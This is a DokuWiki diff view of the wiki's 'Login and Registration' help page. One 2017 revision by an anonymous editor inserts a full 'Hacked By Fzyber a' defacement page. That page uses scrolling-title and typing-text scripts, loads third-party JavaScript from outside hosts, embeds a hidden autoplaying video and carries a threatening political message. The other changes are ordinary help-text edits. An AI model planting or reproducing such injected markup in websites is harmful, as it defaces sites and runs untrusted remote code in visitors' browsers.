DokuWiki

It's better when it's simple

User Tools

Site Tools


login

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Next revisionBoth sides next revision
login [2012-12-22 07:56] – [How to Login] 112.196.18.5login [2017-12-01 09:50] – [Login and Registration] 36.72.74.131
Line 1: Line 1:
-====== Login and Registration =======+<html> 
 +<title>Hacked By Fzyber a</title> 
 +<link REL="SHORTCUT ICON" HREF="http://i45.tinypic.com/1o6cqx.png"> 
 +<script type='text/javascript'> 
 +//<![CDATA[ 
 +msg "..::Hacked By Fzyber a::.. "; 
 +msg ".:Please patch your system:." + msg;pos 0; 
 +function scrollMSG() { 
 +document.title msg.substring(pos, msg.length) + msg.substring(0, pos); pos++; 
 +if (pos > msg.length) pos 
 +window.setTimeout("scrollMSG()",80); 
 +
 +scrollMSG(); 
 +//]]></script> 
 +<script type='text/javascript'> 
 +var DADrightclicktheme 'Dark'; 
 +var DADrightclickimage 'http://sphotos-h.ak.fbcdn.net/hphotos-ak-ash3/p206x206/14562_183874628425481_1378122133_n.jpg';</script> 
 +<script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script> 
 +<script type="text/javascript" src="http://cayunkatel.googlecode.com/files/rainbows.js"></script>
  
-Please noteLogging in is only possible if the Wiki administrator chose to enable [[ACL]] support for the wikiIf ACLs aren't enabled there is no login available and everyone can edit the wiki.+<style type="text/css">body {cursor:url("http://i45.tinypic.com/1o6cqx.png"),default}</style>  
 +<body background="http://i1079.photobucket.com/albums/w515/raafi_teja/matrixrandom.gif">
  
 +</script>
 +
 +<div id="matrix">
 +<b> ................   F Zyber a and Mr ZUCK      ................</b></div>
 +<center>
 +<img src="http://img69.imageshack.us/edit_preview.php?l=img69/9695/maju.gif&action=rotate" /> <br />
 +
 +<style type="text/css">body {
 +
 +background: #000000;
 +
 +font-family: Courier New;
 +
 +color: #ff0000;
 +
 +text-align: center;
 +
 +}
 +
 +a {
 +
 +text-decoration:none;
 +
 +color:
 +
 +#ff0000;
 +
 +}
 +
 +</style>
 +
 +<script type="text/javascript">/*<![CDATA[*/
 +
 +TypingText = function(element, interval, cursor, finishedCallback) {
 +
 +if((typeof document.getElementById ==
 +
 +"undefined") || (typeof element.innerHTML == "undefined")) {
 +
 +this.running = true;
 +
 +return;
 +
 +}
 +
 +this.element = element;
 +
 +this.finishedCallback = (finishedCallback
 +
 +? finishedCallback : function() { return; });
 +
 +this.interval = (typeof interval == "undefined" ? 100 : interval);
 +
 +this.origText = this.element.innerHTML;
 +
 +this.unparsedOrigText = this.origText;
 +
 +this.cursor = (cursor ? cursor : "");
 +
 +this.currentText = "";
 +
 +this.currentChar = 0;
 +
 +this.element.typingText = this;
 +
 +if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
 +
 +TypingText.all.push(this);
 +
 +this.running = false;
 +
 +this.inTag = false;
 +
 +this.tagBuffer = "";
 +
 +this.inHTMLEntity = false;
 +
 +this.HTMLEntityBuffer = "";
 +
 +}
 +
 +TypingText.all = new Array();
 +
 +TypingText.currentIndex = 0;
 +
 +TypingText.runAll
 +
 += function() {
 +
 +for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
 +
 +}
 +
 +TypingText.prototype.run = function() {
 +
 +if(this.running) return;
 +
 +if(typeof this.origText == "undefined") {
 +
 +setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 +
 +return;
 +
 +}
 +
 +if(this.currentText == "") this.element.innerHTML = "";
 +
 +if(this.currentChar < this.origText.length) {
 +
 +if(this.origText.charAt(this.currentChar) == "<" &&
 +
 +!this.inTag) {
 +
 +this.tagBuffer = "<";
 +
 +this.inTag = true;
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else if(this.origText.charAt(this.currentChar) == ">" &&
 +
 +this.inTag) {
 +
 +this.tagBuffer += ">";
 +
 +this.inTag = false;
 +
 +this.currentText += this.tagBuffer;
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else
 +
 +if(this.inTag) {
 +
 +this.tagBuffer += this.origText.charAt(this.currentChar);
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else
 +
 +if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
 +
 +this.HTMLEntityBuffer = "&";
 +
 +this.inHTMLEntity = true;
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
 +
 +this.HTMLEntityBuffer += ";";
 +
 +this.inHTMLEntity =
 +
 +false;
 +
 +this.currentText += this.HTMLEntityBuffer;
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else if(this.inHTMLEntity) {
 +
 +this.HTMLEntityBuffer +=
 +
 +this.origText.charAt(this.currentChar);
 +
 +this.currentChar++;
 +
 +this.run();
 +
 +return;
 +
 +} else {
 +
 +this.currentText += this.origText.charAt(this.currentChar);
 +
 +}
 +
 +this.element.innerHTML = this.currentText;
 +
 +this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ?
 +
 +this.cursor(this.currentText) : this.cursor) : "");
 +
 +this.currentChar++;
 +
 +setTimeout("document.getElementById('" + this.element.id + "').typingText.run()",
 +
 +this.interval);
 +
 +} else {
 +
 +this.currentText = "";
 +
 +this.currentChar = 0;
 +
 +this.running = false;
 +
 +this.finishedCallback();
 +
 +}
 +
 +}
 +
 +
 +/*]]>*/</script>
 +<center>
 +<img src="http://4.bp.blogspot.com/-2h8LgjUDpzY/T0fTA4EQx8I/AAAAAAAAAtU/n_W5Vby8zLU/s400/hacked.gif" border="0"width="350px" height="60px">
 +
 +<p id="message"><b> {+} Website Has Been Hacked By ==> F zyber a {+} </b><br>
 +===========================================
 +<span style="color: green;">
 +<b><br>Hello Sir....</b></font><span style="color: lime;">
 +<br />
 +<br> <b><br>Attacking INDONESIA is the biggest mistakes you've ever done in your life
 +<br> You guys must pay back for that (we will ROCK you) ^_^ </b>
 +</font>
 +<br />
 +<br>
 +<span style="color: Red;">
 +<br><b>Don't Touch Indonesia Website Again !!</b><br></font>
 +<center>
 +<img src="https://bewinchester.files.wordpress.com/2015/12/asli.jpg" border="0"width="550px" height="320px"></center>
 +</center>
 +<div style="text-shadow: 0px 0px 5px red;">
 +<span style="color: white;">
 +<b>Special Thanks To : </b><marquee scrollamount="10" direction="left" width="50%">Mr Zuck - mr zuck - mr zuck - mr zuck - Amar alif akbar - amar alif akbar - amar alif akbar
 +</marquee>
 +
 +<script type="text/javascript">/*<![CDATA[*/
 +
 +new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " +
 +
 +ar[i.length % ar.length]; });
 +
 +
 +//Type out examples:
 +
 +TypingText.runAll();
 +
 +/*]]>*/</script>
 +<embed src="http://www.youtube.com/v/qGaOlfmX8rQ&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1">
 +</body>
 +</html>
 ===== How to Login ===== ===== How to Login =====
  
Line 9: Line 293:
 If you choose to select the "Remember Me" checkbox, you will be automatically logged in the next time you revisit the Wiki. Don't do this on a shared computer e.g. at work or in an internet café. If you choose to select the "Remember Me" checkbox, you will be automatically logged in the next time you revisit the Wiki. Don't do this on a shared computer e.g. at work or in an internet café.
  
-If you have forgotten your password, you can click the resend password link to have a new password sent to your registered email address. If you can't recall your user name, or your email address has changed, you will need to register again. Note: You can disable this behaviour with the [[config:disableactions]] config option by ticking "Send new password" (or by adding ''resendpwd'' if you're manually editing the config file).+If you have forgotten your password, you can click the resend password link to have a new password sent to your registered email address. If you can't recall your user name, or your email address has changed, you will need to register again. Note: You can disable this behaviour with the [[config:disableactions]] config option by ticking "Set new password" (or by adding ''resendpwd'' if you're manually editing the config file), which removes the "Forgotten your password? Get a new one: Set new password" text/hyperlink from the login screen. 
 + 
 +To be able to log in, your Browser needs to support [[wp>HTTP_cookies|Cookies]]. 
 + 
 +Logging out is just a matter of pressing the "Logout" action.
  
-T 
 ===== Registration ===== ===== Registration =====
  
Line 18: Line 305:
 Enter your Userdata and hit register, depending on how the wiki is configured you will either get an auto-generated password by mail (default) or you are allowed to supply your own password in the register form. Enter your Userdata and hit register, depending on how the wiki is configured you will either get an auto-generated password by mail (default) or you are allowed to supply your own password in the register form.
  
-If ''register'' is disabled in the [[config:disableactions]] config option, only the administrator(s) can add users. They can find an "Add new user" link in the "Admin" screen.+If ''register'' is disabled in the [[config:disableactions]] config option, only the administrator(s) can add users. They can find an "Add new user" link in the "User Manageradmin screen.
  
 You can update your registration information at any time. Simply login and click on "Update Profile". You can update your registration information at any time. Simply login and click on "Update Profile".
login.txt · Last modified: 2023-08-01 20:00 by pos-office

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Share Alike 4.0 International
CC Attribution-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki